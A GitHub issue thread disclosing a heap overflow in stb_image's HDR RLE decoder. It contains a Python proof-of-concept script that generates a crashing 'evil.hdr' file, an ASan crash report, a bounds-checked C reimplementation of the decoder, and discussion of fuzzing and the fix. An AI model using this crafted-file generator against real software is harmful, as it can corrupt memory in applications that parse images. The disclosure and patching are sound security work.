stb_image.h: stbi__hdr_load heap overflow #317

Closed
cryptoad opened this issue May 25, 2016 · 6 comments

Comments

@cryptoad

There is a heap overflow condition in the HDR parsing due to the RLE decoding loop not checking that there is enough space in the allocated buffer.

An HDR triggering the vulnerability can be generated with the following Python script:

```python
import struct


def main():
    # Radiance HDR header: magic, pixel format, blank line, then the
    # resolution string. 0x3a = 58 pixels wide, a single scanline.
    h = b'#?RADIANCE\n'
    h += b'FORMAT=32-bit_rle_rgbe\n'
    h += b'\n'
    height = 1
    width = 0x3a
    h += b'-Y %d +X %d\n' % (height, width)  # bytes %-formatting needs Python 3.5+
    # New-style RLE scanline marker: 2, 2, then the width as a big-endian u16.
    h += struct.pack('>BBH', 2, 2, width)
    q = 0x4343434343434343
    for i in range(4):
        # One channel per iteration (R, G, B, E). A count byte > 128 is a run:
        # 128 + 57 repeats the next byte 57 times, filling all but one pixel.
        h += struct.pack('>B', 128 + (width - 1)) + b'B'
        # A count byte <= 128 is a literal block: 3 more bytes, but only 1
        # pixel of room is left, so the unchecked loop writes 2 bytes past
        # the end of the width*4 scanline buffer.
        h += struct.pack('>B', 3) + b'B' + struct.pack('>BB', (q >> (i << 3)) & 0xff,
                                                         (q >> (32 + (i << 3))) & 0xff)

    with open('evil.hdr', 'wb') as f:
        f.write(h)


if __name__ == '__main__':
    main()
```

And here is the ASan report:

==8373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ea8 at pc 0x7f26b4438221 bp 0x7ffcb3d619f0 sp 0x7ffcb3d619e8
WRITE of size 1 at 0x611000009ea8 thread T0
    #0 0x7f26b4438220 in stbi__hdr_load third_party/stblib/stb_image.h:6237:44
    #1 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #2 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #3 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #4 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #5 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #6 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108

0x611000009ea8 is located 0 bytes to the right of 232-byte region [0x611000009dc0,0x611000009ea8)
allocated by thread T0 here:
    #0 0x7f26b441aa3b in __interceptor_malloc third_party/llvm/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f26b4431234 in stbi__malloc third_party/stblib/stb_image.h:900:12
    #2 0x7f26b443805e in stbi__hdr_load third_party/stblib/stb_image.h:6222:55
    #3 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #4 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #5 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #6 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #7 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #8 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108
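
The missing check described above, as an added example that is neither stb_image's code nor the reporter's: a stand-alone reimplementation of the new-style Radiance RLE scanline decode with the run and literal-block lengths bounded by the remaining scanline width, next to a dry run of the unchecked loop that measures how far the reporter's payload would write. The names `reader_t`, `hdr_rle_decode`, `hdr_rle_unchecked_extent` and the demo functions are mine; the evil payload builder reproduces the scanline bytes the script above emits for width 0x3a, and the well-formed scanline is constructed for the example. The rejection of a zero count byte is an extra of my own (it is not discussed in the issue), added because a zero-length block makes no progress and the reader returns 0 at end of input.

```c
#include <stdint.h>
#include <stdio.h>

/* Byte reader over an in-memory buffer; past the end it yields 0 (truncated input). */
typedef struct { const uint8_t *p, *end; } reader_t;
static int get8(reader_t *r) { return r->p < r->end ? *r->p++ : 0; }

/* Decode the body of one new-style Radiance RLE scanline (the bytes after the
 * 2, 2, width_hi, width_lo marker) into out[width * 4], laid out as
 * out[pixel * 4 + channel]. Per channel: count > 128 repeats the next byte
 * (count - 128) times; count <= 128 copies count literal bytes. The two
 * "return -1" length checks are the ones the issue reports as missing. A zero
 * count is rejected too (my assumption: it makes no progress, so on truncated
 * input it would spin forever). Returns 0 on success, -1 if malformed. */
static int hdr_rle_decode(reader_t *r, int width, uint8_t *out)
{
    for (int k = 0; k < 4; ++k) {
        for (int i = 0; i < width; ) {
            int count = get8(r);
            if (count > 128) {
                int value = get8(r);
                count -= 128;
                if (count > width - i) return -1;                /* run past end of scanline */
                for (int z = 0; z < count; ++z) out[i++ * 4 + k] = (uint8_t)value;
            } else {
                if (count == 0 || count > width - i) return -1;  /* literals past end */
                for (int z = 0; z < count; ++z) out[i++ * 4 + k] = (uint8_t)get8(r);
            }
        }
    }
    return 0;
}

/* Dry run of the same loop WITHOUT the length checks: advances the pixel index
 * exactly as the unchecked decoder does, writes nothing, and returns the highest
 * pixel index + 1 reached. Anything above width is an out-of-bounds write; the
 * first lands at byte offset width * 4, which for width 0x3a is 232, i.e.
 * 0 bytes past the 232-byte region in the ASan report. */
static int hdr_rle_unchecked_extent(reader_t *r, int width)
{
    int max_i = 0;
    for (int k = 0; k < 4; ++k) {
        for (int i = 0; i < width; ) {
            int count = get8(r);
            if (count == 0) return -1;                           /* would never terminate */
            if (count > 128) { (void)get8(r); count -= 128; }
            else for (int z = 0; z < count; ++z) (void)get8(r);
            if ((i += count) > max_i) max_i = i;
        }
    }
    return max_i;
}

/* Constructed payload: the scanline bytes the issue's script emits for width 0x3a.
 * Per channel, a 57-pixel run of 'B' then a 3-byte literal block: 60 pixels
 * into a 58-pixel scanline. Returns the number of bytes written. */
static size_t build_evil_scanline(uint8_t *buf, int width)
{
    size_t n = 0; uint64_t q = 0x4343434343434343ULL;
    for (int i = 0; i < 4; ++i) {
        buf[n++] = (uint8_t)(128 + (width - 1)); buf[n++] = 'B';
        buf[n++] = 3; buf[n++] = 'B';
        buf[n++] = (uint8_t)((q >> (i << 3)) & 0xff);
        buf[n++] = (uint8_t)((q >> (32 + (i << 3))) & 0xff);
    }
    return n;
}

/* Constructed well-formed 4-pixel scanline: per channel k, a run of two 0x10+k
 * bytes, then the literal bytes 0x20+k and 0x30+k. */
static const uint8_t GOOD_SCANLINE[] = {
    130, 0x10, 2, 0x20, 0x30,  130, 0x11, 2, 0x21, 0x31,
    130, 0x12, 2, 0x22, 0x32,  130, 0x13, 2, 0x23, 0x33,
};

/* 1 if the hardened decoder rejects the evil scanline (and an empty one) while
 * the dry run shows the unchecked loop reaching pixel 60 of 58; else 0. */
int demo_malformed_rejected(void)
{
    uint8_t payload[64], out[0x3a * 4];
    size_t n = build_evil_scanline(payload, 0x3a);
    reader_t r = { payload, payload + n }, empty = { payload, payload };
    int rc = hdr_rle_decode(&r, 0x3a, out); r.p = payload;
    return rc == -1 && hdr_rle_unchecked_extent(&r, 0x3a) == 60 &&
           hdr_rle_decode(&empty, 4, out) == -1;
}

/* 1 if a well-formed scanline still decodes to the expected pixels; else 0. */
int demo_good_decodes(void)
{
    uint8_t out[4 * 4]; reader_t r = { GOOD_SCANLINE, GOOD_SCANLINE + sizeof GOOD_SCANLINE };
    if (hdr_rle_decode(&r, 4, out) != 0) return 0;
    for (int k = 0; k < 4; ++k)
        if (out[k] != 0x10 + k || out[4 + k] != 0x10 + k ||
            out[8 + k] != 0x20 + k || out[12 + k] != 0x30 + k) return 0;
    return 1;
}

int main(void)
{
    printf("malformed rejected: %d, good decodes: %d\n",
           demo_malformed_rejected(), demo_good_decodes());
    return 0;
}
```

Nothing in this block actually overflows: the dry run only counts pixel indices, so it can be run without a sanitizer. The check `count > width - i` is written with the subtraction on the right so it cannot itself overflow for any byte-sized count, and it applies equally to runs and literal blocks, since either one can extend past the scanline.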
@nothings (Owner)

Is there a reason you're posting a script that generates the file rather than attaching the file?

@cryptoad (Author)

Well the file itself would be a single instance of things gone wrong, while the script can be used to generate other edge cases and test a potential fix more thoroughly.

@nothings (Owner)

nothings commented May 26, 2016

Only if I have whatever fuzzing tool you're using? I don't even have python installed, so it's not particularly useful to me either way.

@cryptoad (Author)

cryptoad commented May 27, 2016

Well, this one just generates an evil.hdr file that triggers the issue. There is no additional dependency on anything; you just need Python. If you don't want to install Python you might be able to use an online compiler, though I haven't tried any.

@andrewla

andrewla commented Jun 6, 2016

I've actually been doing a fuzz of the stb_image.h file and have independently identified most of the issues that @cryptoad has found here. I've been using AFL -- http://lcamtuf.coredump.cx/afl/ -- which is very easy to set up and get running.

For reference, here is a zip of the file produced by the above script, and I've reproed that it does segfault.
evil.hdr.zip

@cryptoad (Author)

cryptoad commented Jun 9, 2016

Attached is a diff that seems to fix the issues reported (and a couple more).
Do not take it as is though, you might want to double check it and do some regression testing to make sure nothing broke.

stblib-diff.txt

rygorous added a commit to rygorous/stb that referenced this issue Aug 13, 2016
Runs need to be bounds checked.

Fixes issues nothings#315, nothings#317.
rygorous added a commit to rygorous/stb that referenced this issue Oct 22, 2016
Runs need to be bounds checked.

Fixes issues nothings#315, nothings#317.
@rygorous rygorous closed this as completed Dec 4, 2016